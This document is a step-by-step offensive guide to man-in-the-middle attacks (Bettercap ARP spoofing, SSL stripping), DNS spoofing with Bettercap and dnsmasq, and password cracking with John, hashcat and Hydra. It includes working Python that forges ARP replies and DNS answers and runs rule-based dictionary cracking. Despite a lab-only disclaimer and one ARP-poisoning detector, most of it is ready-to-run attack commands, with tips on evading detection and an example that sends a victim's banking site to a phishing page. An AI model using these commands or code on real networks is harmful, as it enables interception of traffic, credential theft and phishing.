Here's a guide to conducting man-in-the-middle (MITM) attacks, DNS spoofing, and password cracking using Kali Linux. Note: these techniques are for ethical hacking only and must be performed in a controlled lab environment with proper authorization.
1. Man-in-the-Middle (MITM) Attack
Objective: Intercept and manipulate traffic between a victim and a target server.
Tools:
- Ettercap: GUI/CLI tool for ARP spoofing.
- Bettercap: Modern MITM framework.
- Wireshark: Capture and analyze intercepted traffic.
Steps:
A. ARP Spoofing (MITM Setup)
- Enable IP forwarding so the intercepted traffic is routed on to its real destination instead of being dropped (without it the victim loses connectivity, which is itself a tell):
- echo 1 > /proc/sys/net/ipv4/ip_forward
- Use Bettercap to perform ARP spoofing (it needs raw-socket privileges, so run it as root):
- sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.100; arp.spoof on"
- Replace 192.168.1.100 with the victim's IP. Bettercap sends the victim ARP replies mapping the gateway's IP to your MAC, so the victim's outbound traffic comes to you. The gateway itself is only poisoned as well if you add set arp.spoof.fullduplex true, which you need to see the traffic flowing back to the victim. Leaving arp.spoof.targets unset makes Bettercap poison the entire subnet.
- Capture HTTP traffic:
- sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.100; arp.spoof on; net.sniff on"
- net.sniff parses the forwarded traffic and prints what it recognises in cleartext protocols (HTTP requests including POSTed form data, FTP logins, etc.); http.proxy on additionally runs a transparent proxy through which plain HTTP pages can be inspected or modified. Bettercap 2 has no http.hijack module; net.sniff is the module that logs credentials.
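The frames behind arp.spoof, as an added example that is not code from the page or from Bettercap: it builds the two ARP replies a full-duplex poisoning round consists of and then runs a victim-side check that flags any reply rebinding a known IP (the gateway's) to a different MAC, which is exactly what arp -a on the victim shows once the attack is running. All MACs and IPs are constructed lab values.

```python
"""ARP reply frames as an ARP spoofer sends them, and a victim-side detector
for the cache change they cause.

Added example; not code from the original page or from Bettercap.
Addresses and MACs below are constructed for the demonstration.
"""
import struct

# Constructed lab addresses (assumptions, not from the page).
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:aa:aa:aa:aa:01"       # the router's real MAC
VICTIM_IP = "192.168.1.100"
VICTIM_MAC = "bb:bb:bb:bb:bb:64"
ATTACKER_MAC = "cc:cc:cc:cc:cc:ee"      # eth0 on the Kali box

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet header + RFC 826 ARP reply (42 bytes). A poisoning frame is
    simply a reply whose sender IP belongs to someone else (the gateway)
    while the sender MAC is the attacker's."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)     # Ethernet, IPv4, hlen 6, plen 4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_ip, sender_mac, target_ip, target_mac), or None if not IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return op, ip_str(spa), mac_str(sha), ip_str(tpa), mac_str(tha)


def poison_pair():
    """One round of full-duplex poisoning: tell the victim "gateway IP is at the
    attacker's MAC" and tell the gateway "victim IP is at the attacker's MAC".
    Without full duplex only the first frame is sent, so only the victim's
    outbound traffic passes through the attacker."""
    return [
        build_arp_reply(GATEWAY_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC),
        build_arp_reply(VICTIM_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC),
    ]


def detect_poisoning(frames, known_bindings):
    """Victim-side check: flag ARP replies that rebind a known IP to a new MAC.
    known_bindings maps IP -> MAC learned at boot or pinned as a static entry.
    Returns a list of (ip, expected_mac, claimed_mac) for each offending frame."""
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, spa, sha, _, _ = parsed
        if op == ARP_REPLY and spa in known_bindings and known_bindings[spa] != sha:
            alerts.append((spa, known_bindings[spa], sha))
    return alerts


if __name__ == "__main__":
    bindings = {GATEWAY_IP: GATEWAY_MAC, VICTIM_IP: VICTIM_MAC}
    for ip, expected, claimed in detect_poisoning(poison_pair(), bindings):
        print(f"ALERT: {ip} moved from {expected} to {claimed}")
```

The detector is the logic behind tools such as arpwatch; on a real host the equivalent manual check is comparing the gateway's MAC in arp -a (or ip neigh) before and during the test, and the durable fix for a sensitive host is a static ARP entry for the gateway.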
B. SSL Stripping (Downgrade HTTPS)
sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.100; arp.spoof on; set http.proxy.sslstrip true; http.proxy on"
- SSL stripping is an option of the http.proxy module (http.proxy.sslstrip), not a separate https.strip setting. Links to https:// in pages the victim fetches over plain HTTP are rewritten to http://, so the victim's browser keeps talking cleartext to you while you talk TLS to the real site, exposing whatever it submits. It only works for a site the victim first reaches over HTTP, and not for sites in the browser's HSTS preload list or already visited with HSTS; against a current browser that rules out most sites that matter.
C. Wireshark Analysis:
wireshark
- Capture on the interface you are spoofing from (e.g., eth0).
- Filter with http or tcp to analyze the intercepted data; ip.addr == 192.168.1.100 narrows the view to the victim. Run Wireshark alongside Bettercap and confirm you see both directions of the victim's flows; if you only see requests, the gateway is not poisoned (see arp.spoof.fullduplex above).
2. DNS Spoofing (DNS Poisoning)
Objective: Redirect a victim's domain requests to a malicious IP.
Tools:
- Bettercap: Simple DNS spoofing.
- dnsmasq: Lightweight DNS server for fake entries.
- iptables: Redirect DNS traffic.
Steps:
A. Using Bettercap
- Spoof DNS requests (on top of the ARP spoof from section 1, so the victim's queries actually pass through you):
- sudo bettercap -iface eth0 -eval "set dns.spoof.domains google.com; set dns.spoof.address 192.168.1.100; set dns.spoof.all true; dns.spoof on"
- Bettercap takes the domain list (dns.spoof.domains, comma-separated) and the answer address (dns.spoof.address) as two separate parameters; a domain:ip pair is not accepted. Replace google.com with the target domain and 192.168.1.100 with the IP you want the victim sent to (your machine, or wherever your fake page is hosted). dns.spoof.all true makes the module answer every query it sees rather than only queries addressed to the local machine, which is what you need when the victim's queries are addressed to the real resolver and are merely passing through you.
- Test the spoof:
- With the ARP spoof in place, the victim's next lookup of google.com returns 192.168.1.100; check from the victim with nslookup google.com or dig google.com. An answer already in the victim's cache is served until its TTL expires, and a client that resolves over DNS-over-HTTPS or DNS-over-TLS, or whose resolver traffic does not cross your machine, is unaffected.
B. Using dnsmasq
- Install dnsmasq:
- sudo apt install dnsmasq
- Configure dnsmasq:
- sudo nano /etc/dnsmasq.conf
- # Add the following line to answer example.com (and every name under it) with your IP:
- address=/example.com/192.168.1.100
- All other names are still forwarded to the upstream resolvers from /etc/resolv.conf, so the victim's remaining lookups keep working and the spoof is less conspicuous than a resolver that answers nothing else.
- Restart dnsmasq:
- sudo systemctl restart dnsmasq
- Redirect the victim's DNS traffic to your dnsmasq (on the machine doing the ARP spoof, with IP forwarding enabled; here 192.168.1.100 is that machine's own address):
- sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.1.100
- Add the same rule with -p tcp for resolvers that retry over TCP. sudo iptables -t nat -L PREROUTING -n -v shows per-rule packet counters, which tell you whether the victim's queries are actually hitting the rule.
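What the spoofer on the path actually sends back, as an added example that is not code from the page, from Bettercap or from dnsmasq: it forges the A answer for a query that matches a spoof table (with dnsmasq's address=/domain/ip semantics, where subdomains match too), echoing the victim's transaction ID and question so the stub resolver accepts it, and returns None for any other query, which a real on-path spoofer forwards to the genuine resolver untouched. The spoof table, transaction IDs and queries are constructed.

```python
"""Forging a DNS answer for a query passing through the attacker, the mechanism
behind Bettercap's dns.spoof and dnsmasq's address=/domain/ip.

Added example; not code from the page, Bettercap or dnsmasq. SPOOF_MAP,
the transaction IDs and the queries are constructed for the demonstration.
"""
import struct

# Constructed spoof table (assumption): same meaning as address=/example.com/192.168.1.100
SPOOF_MAP = {"example.com": "192.168.1.100"}

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """example.com -> b'\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, offset):
    """Return (name, offset just past the name); follows RFC 1035 compression pointers."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # pointer to an earlier copy of the name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_query(txid, name, qtype=QTYPE_A):
    """A stub resolver's recursive query (RD=1): one question, nothing else."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def lookup(spoof_map, qname):
    """dnsmasq address=/domain/ip semantics: the domain and every name under it match."""
    parts = qname.lower().rstrip(".").split(".")
    for i in range(len(parts)):
        ip = spoof_map.get(".".join(parts[i:]))
        if ip is not None:
            return ip
    return None


def forge_response(query, spoof_map, ttl=60):
    """Return a forged A answer if the question matches spoof_map, else None.
    The victim's resolver accepts the reply only if the transaction ID, the
    question section and the UDP 4-tuple all match its outstanding query,
    which is why the attacker must sit on the path to see the query first."""
    txid, flags, qdcount = struct.unpack("!HHH", query[:6])
    if flags & 0x8000 or qdcount != 1:             # a response, or not a plain one-question query
        return None
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    ip = lookup(spoof_map, qname)
    if ip is None or qtype != QTYPE_A or qclass != QCLASS_IN:
        return None
    resp_flags = 0x8480 | (flags & 0x0100)         # QR=1, AA=1, RA=1, RD copied from the query
    header = struct.pack("!HHHHHH", txid, resp_flags, 1, 1, 0, 0)
    question = query[12:off + 4]                   # echoed byte for byte
    rdata = bytes(int(o) for o in ip.split("."))
    # Answer name is a compression pointer to the question name at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + rdata
    return header + question + answer


def parse_a_answer(resp):
    """Return (txid, answered name, IPv4) from a single-answer A response; used to verify the forgery."""
    txid = struct.unpack("!H", resp[:2])[0]
    _, off = decode_name(resp, 12)
    off += 4                                       # skip QTYPE/QCLASS of the question
    aname, off = decode_name(resp, off)
    _, _, _, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    rdata = resp[off + 10:off + 10 + rdlen]
    return txid, aname, ".".join(str(b) for b in rdata)


if __name__ == "__main__":
    q = build_query(0x1234, "www.example.com")
    print(parse_a_answer(forge_response(q, SPOOF_MAP)))                # forged: www.example.com -> 192.168.1.100
    print(forge_response(build_query(0x1235, "kali.org"), SPOOF_MAP))  # None: forwarded to the real resolver
```

The TXID-and-question check in the docstring is the whole reason the ARP spoof has to come first: a spoofer that cannot see the query has to guess the 16-bit transaction ID and source port blind, which is a far harder cache-poisoning attack than the on-path case this section describes.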
3. Password Cracking
Objective: Recover passwords from captured hashes or brute-force weak credentials.
Tools:
- John the Ripper: Fast CPU-based cracking.
- Hashcat: GPU-accelerated cracking.
- Hydra: Brute-force network services (SSH, FTP, etc.).
Steps:
A. Cracking Hashes with John the Ripper
- Obtain hashes (e.g., from a captured file or a vulnerable service) and put them one per line in hash.txt. Identify the format first: a raw SHA-1 is 40 hex characters (sha1("password") is 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8), whereas a value starting with $1$ is not SHA-1 but md5crypt from a Unix shadow file, and $6$ is sha512crypt. hashid or hash-identifier on Kali will make a guess for you.
- Unpack the wordlist once (Kali ships it compressed):
- sudo gunzip /usr/share/wordlists/rockyou.txt.gz
- Crack with John:
- john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
- john --show --format=raw-sha1 hash.txt
- Give --format explicitly; several formats are 40 hex characters and John's autodetection has to guess. --show prints what has been cracked so far (results are kept in ~/.john/john.pot).
B. GPU-Accelerated Cracking with Hashcat
- Install Hashcat (if not pre-installed in Kali):
- sudo apt install hashcat
- Crack a hash (e.g., SHA-1):
- hashcat -m 100 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
- -m 100 specifies the hash type (raw SHA-1; -m 0 is MD5) and -a 0 a straight dictionary attack. Add -r /usr/share/hashcat/rules/best64.rule to mutate each word (capitalisation, appended digits and symbols), which is where most real recoveries come from; hashcat --show -m 100 hash.txt lists the cracked entries from the potfile afterwards.
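The mechanics of the dictionary attacks in A and B, as an added example that is not code from the page, from John the Ripper or from hashcat: a straight wordlist run (-a 0) with a handful of hashcat-style rules applied to each word, against unsalted MD5 (-m 0) and SHA-1 (-m 100) targets. WORDLIST and the Summer2024 target are constructed stand-ins for rockyou.txt; the two "password" digests are the genuine MD5 and SHA-1 values.

```python
"""Dictionary attack with rule mutations: the mechanics behind john --wordlist
and hashcat -a 0 for unsalted digests (-m 0 MD5, -m 100 SHA-1).

Added example; not code from the page, John the Ripper or hashcat. WORDLIST and
the Summer2024 target are constructed (a real run uses rockyou.txt); the two
"password" digests are the real MD5 and SHA-1 values.
"""
import hashlib

# Constructed stand-in for /usr/share/wordlists/rockyou.txt (assumption).
WORDLIST = ["123456", "password", "letmein", "dragon", "qwerty", "summer"]

# hashcat -m numbers used on the page, mapped to the digest they denote.
MODES = {0: hashlib.md5, 100: hashlib.sha1}

MD5_PASSWORD = "5f4dcc3b5aa765d61d8327deb882cf99"           # md5("password")
SHA1_PASSWORD = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"  # sha1("password")


def digest(mode, text):
    """Hex digest of text under the given hashcat mode."""
    return MODES[mode](text.encode("utf-8")).hexdigest()


def mutations(word):
    """A few hashcat-style rules (c, $1, $1$2$3, $!, $2$0$2$4 and a leet substitution).
    best64.rule has 64 of these; they are why 'Summer2024' falls to a plain 'summer' entry."""
    cap = word.capitalize()
    yield word
    yield cap
    for suffix in ("1", "123", "!", "2024"):
        yield word + suffix
        yield cap + suffix
    yield word.replace("a", "@").replace("e", "3").replace("o", "0")


def crack(hashes, mode, wordlist):
    """Return {hex_digest: plaintext} for every target recovered.
    Unsalted digests make this cheap: each candidate is hashed once and looked up
    in a set of targets, so cracking 10,000 hashes costs the same as cracking one.
    A per-user salt (md5crypt, sha512crypt, bcrypt) is what breaks this batching."""
    targets = {h.lower() for h in hashes}
    found = {}
    for word in wordlist:
        for candidate in mutations(word):
            d = digest(mode, candidate)
            if d in targets and d not in found:
                found[d] = candidate
                if len(found) == len(targets):
                    return found          # everything cracked; stop early
    return found


if __name__ == "__main__":
    targets = [MD5_PASSWORD, digest(0, "Summer2024"), digest(0, "correct horse battery staple")]
    print(crack(targets, 0, WORDLIST))    # two of three recovered; the passphrase is not in reach
    print(crack([SHA1_PASSWORD], 100, WORDLIST))
```

NTLM (-m 1000) is the same attack over MD4 of the UTF-16LE password; it is left out here only because hashlib's MD4 is disabled in OpenSSL 3 builds of Python, so the block would not run everywhere.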
C. Brute-Force SSH with Hydra
- Brute-force SSH:
- hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 ssh
- Replace admin with the username to target (or use -L users.txt for a list of usernames). -t 4 limits the parallel connections: sshd caps unauthenticated connections through MaxStartups, and Hydra itself warns to use -t 4 for SSH. Expect account lockout policies and fail2ban to stop this against anything but a lab box, so an online attack is for a short list of likely passwords, not for all of rockyou.txt.
D. Cracking NTLM Hashes (Windows)
- Use Hashcat:
- hashcat -m 1000 -a 0 -o cracked.txt ntlm_hash.txt /usr/share/wordlists/rockyou.txt
- -m 1000 is the NT hash (MD4 of the UTF-16LE password, 32 hex characters) as dumped from the SAM or NTDS.dit. Hashes captured on the wire with Responder are NetNTLMv2 challenge-responses and need -m 5600 instead (NetNTLMv1 is -m 5500); -m 1000 on those simply finds nothing.
Quick Reference Table
Technique | Tool | Command/Usage |
---|---|---|
ARP Spoofing | Bettercap | bettercap -iface eth0 -eval "set arp.spoof.targets <victim_ip>; arp.spoof on" |
DNS Spoofing | Bettercap | bettercap -eval "set dns.spoof.domains google.com; set dns.spoof.address <mal_ip>; set dns.spoof.all true; dns.spoof on" |
SSL Stripping | Bettercap | bettercap -eval "set http.proxy.sslstrip true; http.proxy on" |
Hash cracking (CPU) | John | john --format=raw-sha1 --wordlist=rockyou.txt hash.txt |
Hash cracking (GPU) | Hashcat | hashcat -m 100 -a 0 hash.txt rockyou.txt (-m 0 MD5, -m 1000 NTLM) |
Online SSH brute force | Hydra | hydra -l user -P pass.txt -t 4 192.168.1.100 ssh |
Best Practices
- Ethical Compliance:
- Authorization: Only test systems you own or have explicit written permission to test.
- Scope: Define clear boundaries (hosts, time window, techniques) to avoid unintended damage; an ARP spoof with no arp.spoof.targets set poisons the whole subnet.
- Legal Risks:
- Do not perform these attacks on unauthorized networks or systems.
- Report findings to the affected organization if authorized.
- Avoid Detection:
- Throttle brute-force attempts (Hydra -t 4, delays between guesses); this also avoids locking out accounts and flooding the target.
- Rotate IPs or use Tor for anonymity (if legal and within the agreed scope).
- Use VMs:
- Test in a virtual lab (e.g., a Metasploitable VM on an isolated host-only network) to contain the effects.
Example Workflow
- MITM Attack:
- Use Bettercap (arp.spoof) to place yourself between the victim and the gateway.
- Capture credentials from cleartext traffic with net.sniff, or through http.proxy with SSL stripping.
- DNS Spoofing:
- Redirect the victim's banking site to a phishing page you host (dns.spoof or dnsmasq); this only works for a domain the browser will still load over plain HTTP.
- Password Cracking:
- Crack the captured or dumped hashes with Hashcat, then test recovered passwords against other in-scope services with Hydra.
Practice Resources
- Tools:
- Kali Linux: Pre-installed tools for MITM and cracking.
- Metasploitable VM: A vulnerable VM for testing.
- Platforms:
- Hack The Box (practice MITM and password cracking).
- TryHackMe (rooms like "MITM" and "Password Cracking").
Final Notes
- Stay Updated: Follow CVE databases (e.g., CVE Details).
- Automate: Write scripts for repetitive tasks (e.g., hash cracking loops).
- Join Communities: Engage with Offensive Security or Reddit's r/NetSecpentest.
By mastering these techniques, you’ll gain insight into network vulnerabilities and the importance of secure configurations. Always prioritize ethical and legal compliance ! 🔍🛡️